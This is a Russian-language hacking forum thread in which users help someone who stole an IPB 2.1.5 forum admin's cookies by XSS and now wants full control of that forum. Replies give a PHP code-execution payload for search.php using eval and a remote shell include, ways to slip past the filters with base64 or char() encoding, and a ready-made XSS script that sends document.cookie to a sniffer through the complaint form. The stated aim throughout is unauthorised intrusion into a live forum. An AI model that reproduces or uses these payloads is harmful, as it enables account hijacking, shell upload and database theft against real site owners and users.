У меня проблема: мне удалось украсть куки админа форума IPB v2.1.5 с помощью XSS, но хеш там с солью поэтому расшифровать его я не могу. А от SQL бага в search.php он пропадчен
IPB WARNING [2] preg_replace(): Unknown modifier '[' (Line: 1261 of /sources/action_public/search.php)
Можно ли как-нибудь узнать соль не имея доступа к Mysql?
Почитал темы про хеш с солью, но там все отвечают, что бесполезно.
Получается замкнутый круг: чтобы узнать соль и расшифровать пароль - нужен доступ к базе, а чтобы залить шелл и сдампить базу - нужно знать админский пас. Какой выход?

Соль хранится именно там, следовательно без доступа никак.

Но.

Там в search ещё и выполнение php кода было, а это как-бы сразу шелл, без пароля.
http://forum.antichat.ru/thread18222.html

Да, и по моему, цитируемый тобою ответ не говорит о том, что форум пропатчен.

Давай ссълку на форум взглянем.Можно и на ПМ.

Но.
Там в search ещё и выполнение php кода было, а это как-бы сразу шелл, без пароля.
Да, и по моему, цитируемый тобою ответ не говорит о том, что форум пропатчен.
Пробовал ручками без сплоита: Вначале я создал сообщение с текстом eval(phpinfo()); // и своим тестом
Потом в поиске указал свой ник и текст eval.
форум благополучно вывел мое сообщение. К получившемуся урлу я добавил &lastdate=z|eval.*?%20//)%23e%00

Вылетает таже ошибка, насколько я понял ipb ругается на присутствие символа '['. Может можно как-то это обойти?
Ладно если ничего не выйдет с самим форумом, то найду сайт на том же сервере с бажным phpBB или IPB (Полный путь к конфигу я знаю)

Вот так можно попробовать eval(include(шифрованая ссълка на шел)
пост едит.Потом в search идем исчем eval.Найдеш в урл тогда можно добавить &lastdate=z|eval.*?%20//)%23e%00

Знаю, но хрен скажу. Ты не должен использовать запрещённые в ipb символы. Да, уязвимомть это описана вдоль и поперёк, читай.

nytros base64 тебе поможет

не пробовал записать всё что внутри eval() в виде chаr?

У меня проблема: мне удалось украсть куки админа форума IPB v2.1.5 с помощью XSS, но хеш там с солью поэтому расшифровать его я не могу. А от SQL бага в search.php он пропадчен

Можно ли как-нибудь узнать соль не имея доступа к Mysql?
Почитал темы про хеш с солью, но там все отвечают, что бесполезно.
Получается замкнутый круг: чтобы узнать соль и расшифровать пароль - нужен доступ к базе, а чтобы залить шелл и сдампить базу - нужно знать админский пас. Какой выход?
Не мог-бы дать мне код на XSS для IPB 2.1.5 плиз :)

Через репорт.

Поточнее репор= то есть ЖАЛОБА, регишся на форуме пишеш жалобу а в жалобе это-
<script>img = new Image(); img.src = "адресс сниферра?"+document.cookie;</script> Птом ждёш= на снифф приходят куки= куки заменяеш на свои= все вуаля! Качай видюху лучше....